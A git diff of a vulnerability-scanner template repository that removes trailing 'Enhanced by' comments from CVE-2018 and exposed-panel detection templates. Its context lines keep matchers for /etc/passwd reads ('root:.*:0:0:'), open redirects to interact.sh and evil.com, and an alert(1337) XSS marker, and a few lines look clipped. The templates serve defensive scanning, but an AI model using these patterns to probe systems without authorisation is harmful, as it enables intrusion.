by mp on 2022/07/07 + diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 6386830369..0f9fffeac8 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -32,4 +32,4 @@ http: part: body regex: - '^var fgt_lang =' -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index f28103f0a0..be03792ec3 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -45,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index ab551cbdbe..492e06c487 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 7e2cce6553..872cec7b3b 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -40,4 +40,4 @@ http: words: - text/html -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index a116a2f0a3..00a859e431 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 0ac214323c..c878882242 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -33,4 +33,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/13 + diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index dd98158430..d779c97be4 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -38,4 +38,4 @@ http: - "Location: http://www.interact.sh" part: header -# Enhanced by md on 2022/10/13 + diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index c68a8d7650..32c180f762 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -31,4 +31,4 @@ http: - "root:.*:0:0:" part: body -# Enhanced by mp on 2022/04/01 + diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 7be1edfea5..bca9500751 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/18 + diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index c6ab69c9ee..aa2beecd23 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index dd969d1069..abfaadf74c 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/07 + diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index e69e2fbbb3..913e454492 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -29,4 +29,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 8977fc7dd6..c21fbef24b 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/07 + diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 1c00fd5e65..f728e9d1bc 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -30,4 +30,4 @@ http: words: - "http" -# Enhanced by mp on 2022/04/06 + diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 16ff8bf50b..a70a01c533 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/08 + diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 245414b2ed..ee054f6268 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/06/13 + diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 8459db4064..977892e397 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -69,4 +69,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/22 + diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index fe5f414086..aeaeaed7a5 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index a8e8f28dd2..17f745087f 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -35,4 +35,4 @@ http: - "extensions" condition: and -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 2d3d270e8d..ce84867b2b 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/14 + diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 89ab9f7d60..4bce0d966a 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -41,4 +41,4 @@ http: - 'contains(body, "images") && contains(body, "title")' condition: and -# Enhanced by md on 2023/03/13 + diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 5bfeb42247..24cdf836dd 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -35,4 +35,4 @@ http: words: - "http" -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index a99822eac0..c6cdf78476 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -30,4 +30,4 @@ http: - "root:.*:0:0:" part: body -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 86d4e413ce..9b6edbc424 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/13 + diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 1ef5d61ed7..b744cebd26 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/13 + diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml index 32317f20e6..3f2b80d205 100644 --- a/http/cves/2018/CVE-2018-16341.yaml +++ b/http/cves/2018/CVE-2018-16341.yaml @@ -25,4 +25,4 @@ http: words: - "31333333337" -# Enhanced by mp on 2022/06/13 + diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index be9ced8df6..d4b6d37fe2 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -39,4 +39,4 @@ http: - "** Application sources **" condition: and -# Enhanced by md on 2023/01/30 + diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index a503d7c87a..0ad071a2e4 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -37,4 +37,4 @@ http: - "Reader.STATUS" condition: and -# Enhanced by md on 2023/01/30 + diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 8c70064a83..d01ac0ad8f 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -38,4 +38,4 @@ http: regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# Enhanced by md on 2023/01/30 + diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 87b983eb8b..35b00a5e3b 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/18 + diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 80317b2d50..0df985fa1c 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -32,4 +32,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/13 + diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 7ed6427265..932d260474 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -36,4 +36,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 3c8b694c6d..9ad6f63e9b 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/13 + diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 84a59a0192..bd222e925a 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/03 + diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 9da237ab2b..2781d236d7 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -44,4 +44,4 @@ http: words: - "application/json" -# Enhanced by mp on 2023/01/15 + diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 3c59225818..e73a1f5858 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -33,4 +33,4 @@ http: words: - "nuclei-template" -# Enhanced by mp on 2022/02/08 + diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 6865d17e2f..437f8c67b0 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -34,4 +34,4 @@ http: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# Enhanced by md on 2022/10/13 + diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index dc5ae4e713..e4c1af11a9 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/13 + diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index b8171c5dff..d55a59d484 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -36,4 +36,4 @@ http: - 'contains(body, "\">")' condition: and -# Enhanced by mp on 2022/04/08 + diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 1600747d97..987cb4a40a 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/06/13 + diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 76dc33fe75..23dc9b3766 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/17 + diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 23eff8504c..620b037337 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -38,4 +38,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 5924c006a9..a9cac6f249 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -44,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 9916fc8c86..4dd72661c7 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -38,4 +38,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 0f5f7c579f..a99db44db8 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 788b5f4473..db484b0e86 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -35,4 +35,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index c8cdae0248..ca7af59df5 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -38,4 +38,4 @@ http: dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' -# Enhanced by mp on 2022/05/13 + diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 99f4cd5a9b..56e4714a27 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -50,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 75b7fd4247..2365caf620 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 119c37063e..2c62ba239d 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -52,4 +52,4 @@ http: status: - 200 -# Enhanced by md on 2022/10/17 + diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 1755b17f2a..c7a47929b3 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -40,4 +40,4 @@ http: words: - "application/octet-stream" -# Enhanced by mp on 2022/06/13 + diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index c6b04cca2a..263aeb2ddd 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/20 + diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 94840d51b7..82dc378655 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -32,4 +32,4 @@ http: words: - 'alert(1337)" part: body -# Enhanced by md on 2022/11/10 + diff --git a/http/exposed-panels/completeview-web-panel.yaml b/http/exposed-panels/completeview-web-panel.yaml index fd7c47aba1..1d5eda9f1d 100644 --- a/http/exposed-panels/completeview-web-panel.yaml +++ b/http/exposed-panels/completeview-web-panel.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2023/01/29 + diff --git a/http/exposed-panels/concourse-ci-panel.yaml b/http/exposed-panels/concourse-ci-panel.yaml index cd66acfda0..320a28280b 100644 --- a/http/exposed-panels/concourse-ci-panel.yaml +++ b/http/exposed-panels/concourse-ci-panel.yaml @@ -29,4 +29,4 @@ http: - 'login to Concourse' condition: or -# Enhanced by md on 2022/11/10 + diff --git a/http/exposed-panels/concrete5/concrete5-install.yaml b/http/exposed-panels/concrete5/concrete5-install.yaml index c251c25272..e96ef5b1ec 100644 --- a/http/exposed-panels/concrete5/concrete5-install.yaml +++ b/http/exposed-panels/concrete5/concrete5-install.yaml @@ -38,4 +38,4 @@ http: regex: - 'Version ([0-9.]+)' -# Enhanced by mp on 2022/03/21 + diff --git a/http/exposed-panels/concrete5/concrete5-panel.yaml b/http/exposed-panels/concrete5/concrete5-panel.yaml index ca4233a400..590a59b890 100644 --- a/http/exposed-panels/concrete5/concrete5-panel.yaml +++ b/http/exposed-panels/concrete5/concrete5-panel.yaml @@ -37,4 +37,4 @@ http: - 'content="concrete5 \- ([0-9.]+)"\/>' - 'Version ([0-9.]+)' -# Enhanced by md on 2022/11/10 + diff --git a/http/exposed-panels/connect-box-login.yaml b/http/exposed-panels/connect-box-login.yaml index d9bb54df08..d1840f3022 100644 --- a/http/exposed-panels/connect-box-login.yaml +++ b/http/exposed-panels/connect-box-login.yaml @@ -38,4 +38,4 @@ http: status: - 302 -# Enhanced by md on 2023/01/24 + diff --git a/http/exposed-panels/connectwise-backup-manager.yaml b/http/exposed-panels/connectwise-backup-manager.yaml index 7f486e3bed..50900a55f6 100644 --- a/http/exposed-panels/connectwise-backup-manager.yaml +++ b/http/exposed-panels/connectwise-backup-manager.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/10 + diff --git a/http/exposed-panels/contao-login-panel.yaml b/http/exposed-panels/contao-login-panel.yaml index 0d72a006bf..f032587d0c 100644 --- a/http/exposed-panels/contao-login-panel.yaml +++ b/http/exposed-panels/contao-login-panel.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/10 + diff --git a/http/exposed-panels/content-central-login.yaml b/http/exposed-panels/content-central-login.yaml index b5d56894a1..074b0d9477 100644 --- a/http/exposed-panels/content-central-login.yaml +++ b/http/exposed-panels/content-central-login.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/03 + diff --git a/http/exposed-panels/contentkeeper-detect.yaml b/http/exposed-panels/contentkeeper-detect.yaml index dea8410060..61092684ce 100644 --- a/http/exposed-panels/contentkeeper-detect.yaml +++ b/http/exposed-panels/contentkeeper-detect.yaml @@ -37,4 +37,4 @@ http: - "text/html" part: header -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/corebos-panel.yaml b/http/exposed-panels/corebos-panel.yaml index fb1d63ed05..712f02f22b 100644 --- a/http/exposed-panels/corebos-panel.yaml +++ b/http/exposed-panels/corebos-panel.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/cortex-xsoar-login.yaml b/http/exposed-panels/cortex-xsoar-login.yaml index 51785da77b..6f619d7fee 100644 --- a/http/exposed-panels/cortex-xsoar-login.yaml +++ b/http/exposed-panels/cortex-xsoar-login.yaml @@ -29,4 +29,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/couchdb-exposure.yaml b/http/exposed-panels/couchdb-exposure.yaml index 92abe675f3..b4febb91ca 100644 --- a/http/exposed-panels/couchdb-exposure.yaml +++ b/http/exposed-panels/couchdb-exposure.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/couchdb-fauxton.yaml b/http/exposed-panels/couchdb-fauxton.yaml index a14f100dae..6722db78be 100644 --- a/http/exposed-panels/couchdb-fauxton.yaml +++ b/http/exposed-panels/couchdb-fauxton.yaml @@ -23,4 +23,4 @@ http: words: - 'Project Fauxton' -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/cpanel-api-codes.yaml b/http/exposed-panels/cpanel-api-codes.yaml index b2d84834e8..0238f45875 100644 --- a/http/exposed-panels/cpanel-api-codes.yaml +++ b/http/exposed-panels/cpanel-api-codes.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/craftcms-admin-panel.yaml b/http/exposed-panels/craftcms-admin-panel.yaml index 18017f24c7..68465f6f96 100644 --- a/http/exposed-panels/craftcms-admin-panel.yaml +++ b/http/exposed-panels/craftcms-admin-panel.yaml @@ -31,4 +31,4 @@ http: words: - 'CRXDE Lite" -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/csod-panel.yaml b/http/exposed-panels/csod-panel.yaml index 07115d5bb3..eef24687a3 100644 --- a/http/exposed-panels/csod-panel.yaml +++ b/http/exposed-panels/csod-panel.yaml @@ -27,4 +27,4 @@ http: part: body condition: or -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/cudatel-panel.yaml b/http/exposed-panels/cudatel-panel.yaml index f4ecbb2d58..5ca146a514 100644 --- a/http/exposed-panels/cudatel-panel.yaml +++ b/http/exposed-panels/cudatel-panel.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by md on 2022/12/05 + diff --git a/http/exposed-panels/cvent-panel-detect.yaml b/http/exposed-panels/cvent-panel-detect.yaml index 1d4eedc426..427205853f 100644 --- a/http/exposed-panels/cvent-panel-detect.yaml +++ b/http/exposed-panels/cvent-panel-detect.yaml @@ -35,4 +35,4 @@ http: - "Cvent, Inc." condition: or -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/cwp-webpanel.yaml b/http/exposed-panels/cwp-webpanel.yaml index 028f276a3b..03813f0378 100644 --- a/http/exposed-panels/cwp-webpanel.yaml +++ b/http/exposed-panels/cwp-webpanel.yaml @@ -37,4 +37,4 @@ http: words: - "cwpsrv" -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/cx-cloud-login.yaml b/http/exposed-panels/cx-cloud-login.yaml index 75b4a3aa3b..76df734335 100644 --- a/http/exposed-panels/cx-cloud-login.yaml +++ b/http/exposed-panels/cx-cloud-login.yaml @@ -24,4 +24,4 @@ http: words: - "CX Cloud" -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml index 5f21f6b83f..c330e77556 100644 --- a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml +++ b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml @@ -38,4 +38,4 @@ http: regex: - 'src="\/javascript\/validation\/sslvpnlogin\.js\?version=(.+)" ><\/script>' -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/d-link-wireless.yaml b/http/exposed-panels/d-link-wireless.yaml index cb1c588526..39d0821455 100644 --- a/http/exposed-panels/d-link-wireless.yaml +++ b/http/exposed-panels/d-link-wireless.yaml @@ -30,4 +30,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/darktrace-threat-visualizer.yaml b/http/exposed-panels/darktrace-threat-visualizer.yaml index 0fabe2bd65..63ecb8308a 100644 --- a/http/exposed-panels/darktrace-threat-visualizer.yaml +++ b/http/exposed-panels/darktrace-threat-visualizer.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/datadog-login.yaml b/http/exposed-panels/datadog-login.yaml index 65fd79d6c8..d4b1d5387b 100644 --- a/http/exposed-panels/datadog-login.yaml +++ b/http/exposed-panels/datadog-login.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/dataiku-panel.yaml b/http/exposed-panels/dataiku-panel.yaml index 3690a570c4..83b5646bde 100644 --- a/http/exposed-panels/dataiku-panel.yaml +++ b/http/exposed-panels/dataiku-panel.yaml @@ -31,4 +31,4 @@ http: words: - "text/html" -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/davantis-panel.yaml b/http/exposed-panels/davantis-panel.yaml index c935528280..091845454f 100644 --- a/http/exposed-panels/davantis-panel.yaml +++ b/http/exposed-panels/davantis-panel.yaml @@ -30,4 +30,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/daybyday-panel.yaml b/http/exposed-panels/daybyday-panel.yaml index 6060601477..21aa2651fa 100644 --- a/http/exposed-panels/daybyday-panel.yaml +++ b/http/exposed-panels/daybyday-panel.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/09 + diff --git a/http/exposed-panels/defectdojo-panel.yaml b/http/exposed-panels/defectdojo-panel.yaml index 63a8575b27..eb3b65ffed 100644 --- a/http/exposed-panels/defectdojo-panel.yaml +++ b/http/exposed-panels/defectdojo-panel.yaml @@ -24,4 +24,4 @@ http: words: - "\"DefectDojoDolibarr ([0-9.]+)<\/td>' - '
    Dolibarr ([0-9.]+)<\/div>' -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/dotclear-panel.yaml b/http/exposed-panels/dotclear-panel.yaml index 258252587f..75b9d9333c 100644 --- a/http/exposed-panels/dotclear-panel.yaml +++ b/http/exposed-panels/dotclear-panel.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/dotcms-admin-panel.yaml b/http/exposed-panels/dotcms-admin-panel.yaml index b8092a0940..00882e977b 100644 --- a/http/exposed-panels/dotcms-admin-panel.yaml +++ b/http/exposed-panels/dotcms-admin-panel.yaml @@ -24,4 +24,4 @@ http: words: - 'dotCMS Content Management Platform' -# Enhanced by md on 2022/11/11 + diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index 1d9fc1689e..48ad0a520d 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by md on 2022/11/28 + diff --git a/http/exposed-panels/dqs-superadmin-panel.yaml b/http/exposed-panels/dqs-superadmin-panel.yaml index 542868743d..2ca57eda9a 100644 --- a/http/exposed-panels/dqs-superadmin-panel.yaml +++ b/http/exposed-panels/dqs-superadmin-panel.yaml @@ -30,4 +30,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/03 + diff --git a/http/exposed-panels/dradis-pro-panel.yaml b/http/exposed-panels/dradis-pro-panel.yaml index 961e51d9e4..e6e3960166 100644 --- a/http/exposed-panels/dradis-pro-panel.yaml +++ b/http/exposed-panels/dradis-pro-panel.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by 